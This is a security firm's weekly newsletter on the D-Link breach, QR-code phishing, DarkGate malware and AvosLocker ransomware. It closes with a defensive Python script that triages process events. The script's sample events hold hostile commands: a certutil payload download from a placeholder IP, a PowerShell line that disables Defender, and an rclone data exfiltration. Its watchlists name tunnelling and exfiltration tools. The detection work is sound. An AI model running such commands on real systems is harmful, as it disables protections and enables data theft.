Weekly Cyber Reports

This Week in Cyber 20th October 2023

Latest news and views from our Cyber Analysts

Written by

Team Nucleus

Written on

19th October, 2023



Cybersecurity Breach at D-Link: Lessons on Data Exposure and the Role of MDR Services


Overview

D-Link, the Taiwanese networking equipment manufacturer, has confirmed a data breach that exposed what it termed "low-sensitivity and semi-public information." The company said the data came from an old D-View 6 system that had been used for product registration in the past, not from its cloud services, and that it contained no user IDs or financial information. The breach came to light when an unauthorised party claimed to have stolen the data of Taiwanese government officials along with the source code of D-Link's D-View network management software.


D-Link engaged the cybersecurity firm Trend Micro to investigate and found that only around 700 "outdated and fragmented" records had been exposed, contradicting the attacker's initial claim of millions of users' records. The company believes the intrusion began with an employee falling for a phishing attack and says it is tightening its security practices. D-Link has also stated that current, active customers are unlikely to be affected.



Analyst Insight

A Managed Detection and Response (MDR) service is most useful in the window between the phishing click and the data leaving the network: continuous monitoring of authentication and network activity can surface the credential use and unusual access that follow a successful phish, so the incident is contained before much is exfiltrated. The other lesson is about the system itself: a legacy registration host that is no longer in service but still reachable is an exposure in its own right, and an asset inventory that flags such systems for decommissioning or isolation removes the target before the phish ever lands.




Alarming Trends in Employee Phishing Susceptibility: QR Codes and the Need for Ongoing Training


Overview

A study known as the Hoxhunt Challenge has highlighted concerning trends in employees' susceptibility to phishing, with a particular focus on QR codes. The research, conducted across various industries and regions, found that 22% of phishing attacks in October 2023 used QR codes to deliver malicious content. Employee responses to simulated attacks were categorised as success (identified and reported), miss (neither reported nor scanned), or click/scan; only 36% of recipients identified and reported the simulated attacks, leaving many organisations exposed. The retail sector had the highest miss rate, while legal and business services were best at recognising and reporting suspicious QR codes.



Analyst Insight

The study underscores the need for continuous security awareness training, from onboarding through regular refreshers, as a key defence against phishing and QR-code lures in particular. QR codes deserve specific attention because scanning one moves the click from the managed endpoint to a personal phone, where the corporate email gateway, web proxy and endpoint controls usually have no visibility; the employee's own recognition and reporting is often the only control left in the path.



DarkGate: A Persistent Threat


Overview

DarkGate, a sophisticated malware family, has re-emerged, infiltrating organisations worldwide via compromised Skype and Microsoft Teams accounts. Since August it has been seen against targets across the globe, with 41% of detections in the Americas.


DarkGate's complexity is evident in its range of capabilities, spanning system reconnaissance, cryptocurrency mining, keylogging, and privilege escalation. Telesoft's Security Operations Center (SOC) team monitors collaboration channels such as Teams and Skype in real time, flagging anomalous file attachments and scrutinising messages from external senders, which gives early warning of the lures DarkGate relies on.



Analyst Insight

DarkGate hides behind legitimate tooling such as the AutoIt scripting runtime, which makes signature-based detection of the initial loader unreliable; a more dependable signal is the AutoIt interpreter running from a user-writable location or being spawned by a chat client. Once inside, DarkGate drops further payloads, including updated DarkGate components and Remcos, a well-known remote access trojan, which increases the potential impact. Telesoft's MDR service applies threat intelligence to this behaviour, recognising the subtle patterns that distinguish DarkGate from benign use of the same tools.


Preventing Ransomware Deployment: How 24/7 MDR Services Stay Ahead of Emerging Threats


Overview

AvosLocker ransomware affiliates have been targeting critical infrastructure sectors in the United States, with incidents seen as recently as May 2023. The affiliates compromise networks using legitimate software and open-source tools, and they pair encryption with data extortion, threatening to leak or publish stolen data. The strain, active since mid-2021, uses techniques to disable antivirus protection and has variants for Windows, Linux, and VMware ESXi.


Key characteristics of AvosLocker intrusions include the use of open-source tools and "living-off-the-land" tactics, which leave minimal traces for attribution. Legitimate utilities are used for data exfiltration, tunnelling, and command-and-control, while custom scripts and tools are employed for lateral movement and privilege escalation. The FBI and CISA, which issued the advisory behind these findings, recommend security measures for critical infrastructure organisations to reduce the likelihood and impact of ransomware attacks.


Ransomware attacks have surged in 2023, and threat actors are deploying ransomware quickly, often within a day of initial access. Common initial access vectors include public-facing applications, stolen credentials, off-the-shelf malware, and external remote services. The rise of ransomware-as-a-service (RaaS) and the availability of ransomware code have lowered the barrier to entry; smaller organisations are increasingly targeted, and human-operated ransomware attacks have increased substantially.



Analyst Insight


Telesoft's 24/7 MDR service is positioned to catch ransomware operations such as AvosLocker in their early stages, when the adversary is still staging tools, disabling defences and moving laterally rather than encrypting. Real-time monitoring, threat intelligence, anomaly detection and rapid incident response give organisations the chance to contain the intrusion before ransomware is deployed and significant damage is done. With time-to-ransom now often under a day, that response has to be measured in hours, which is what round-the-clock coverage is for.
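The two behaviours discussed above, DarkGate's use of the AutoIt runtime delivered through Teams and Skype and AvosLocker's living-off-the-land staging, both leave their clearest trace in process-creation telemetry. The following Python script is an added example, not Telesoft's detection content or either malware family's code, of how an analyst might triage such events: the Sysmon-style field names, the indicator lists (chat clients, script hosts, download and tunnelling utilities, the Defender tampering command) and the JSON-lines sample events are all assumptions constructed for illustration.

```python
"""Process-creation triage for the DarkGate and AvosLocker behaviours
described above. Added example, not Telesoft's detection content: the event
schema (a subset of Sysmon Event ID 1 fields), the indicator lists and the
sample events are all assumptions constructed for illustration."""
import json
import re
from pathlib import PureWindowsPath

# Chat clients the report names as DarkGate's delivery channel, and the
# script hosts a lure typically lands in (assumed lists).
MESSAGING_APPS = {"ms-teams.exe", "teams.exe", "skype.exe", "skypeapp.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
AUTOIT_INTERPRETERS = {"autoit3.exe", "autoit3_x64.exe"}

# Directories an ordinary user can write to. A legitimate, signed interpreter
# running from here instead of Program Files is the AutoIt signal to triage.
USER_WRITABLE = re.compile(r"^(c:\\users\\[^\\]+\\|c:\\programdata\\|c:\\windows\\temp\\)", re.I)

# Assumed watchlist for the living-off-the-land stage: built-in download
# utilities, tunnelling/exfiltration tools and Defender tampering.
LOTL_PATTERNS = {
    "lolbin_download": re.compile(r"\b(certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s+/transfer)", re.I),
    "exfil_or_tunnel_tool": re.compile(r"\b(rclone|ligolo|chisel|ngrok|plink)(\.exe)?\b", re.I),
    "defender_tamper": re.compile(r"Set-MpPreference\s.*-Disable\w+|sc(\.exe)?\s+stop\s+WinDefend", re.I),
}

# Constructed sample events, not captured telemetry (198.51.100.7 is a
# documentation-reserved address).
SAMPLE_EVENTS = r"""
{"host":"WS01","ts":"2023-10-16T09:12:03Z","parent":"C:\\Program Files\\WindowsApps\\MSTeams_23.1\\ms-teams.exe","image":"C:\\Windows\\System32\\wscript.exe","cmdline":"wscript.exe C:\\Users\\alice\\Downloads\\Invoice.pdf.vbs"}
{"host":"WS01","ts":"2023-10-16T09:12:41Z","parent":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Users\\alice\\AppData\\Local\\Temp\\xk9\\AutoIt3.exe","cmdline":"AutoIt3.exe C:\\Users\\alice\\AppData\\Local\\Temp\\xk9\\script.au3"}
{"host":"WS02","ts":"2023-10-16T10:02:17Z","parent":"C:\\Windows\\explorer.exe","image":"C:\\Program Files (x86)\\AutoIt3\\AutoIt3.exe","cmdline":"AutoIt3.exe build.au3"}
{"host":"WS02","ts":"2023-10-16T10:30:00Z","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe notes.txt"}
{"host":"SRV03","ts":"2023-10-16T22:45:09Z","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"}
{"host":"SRV03","ts":"2023-10-16T22:51:30Z","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://198.51.100.7/svc.exe C:\\ProgramData\\svc.exe"}
{"host":"SRV03","ts":"2023-10-16T23:20:02Z","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\ProgramData\\rclone.exe","cmdline":"rclone.exe copy D:\\Finance remote:share --transfers 8"}
"""


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def analyse(event: dict) -> list[str]:
    """Return the name of every rule the event trips (empty if nothing fires)."""
    hits = []
    parent, image, cmd = base(event["parent"]), base(event["image"]), event["cmdline"]
    if parent in MESSAGING_APPS and image in SCRIPT_HOSTS:
        hits.append("script_host_from_messaging_app")
    if image in AUTOIT_INTERPRETERS and USER_WRITABLE.match(event["image"]):
        hits.append("autoit_from_user_writable_path")
    for name, pattern in LOTL_PATTERNS.items():
        if pattern.search(cmd):
            hits.append(name)
    return hits


def triage(jsonl: str) -> list[dict]:
    """Parse JSON-lines events and return findings ordered by host and time,
    so each host's findings read as a timeline of how far the intrusion got."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            for rule in analyse(ev):
                findings.append({"host": ev["host"], "ts": ev["ts"],
                                 "rule": rule, "image": base(ev["image"])})
    return sorted(findings, key=lambda f: (f["host"], f["ts"]))


def hosts_to_escalate(findings: list[dict], min_rules: int = 2) -> list[str]:
    """Hosts tripping several distinct rules are the ones to page on first:
    with time-to-ransom often under a day, they cannot wait for the next shift."""
    rules_by_host: dict[str, set] = {}
    for f in findings:
        rules_by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']} {f['ts']} {f['rule']:32} {f['image']}")
    print("escalate:", hosts_to_escalate(found))
```

Running it prints five findings (three on SRV03, two on WS01) and escalates both hosts, while the developer's installed copy of AutoIt on WS02 stays quiet. The path check is the important design choice: the AutoIt interpreter is legitimate and signed, so blocking it outright breaks genuine use, whereas the location it runs from and the process that launched it are what separate an installed tool from a dropped one. Swap the watchlists for your own telemetry before relying on it.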
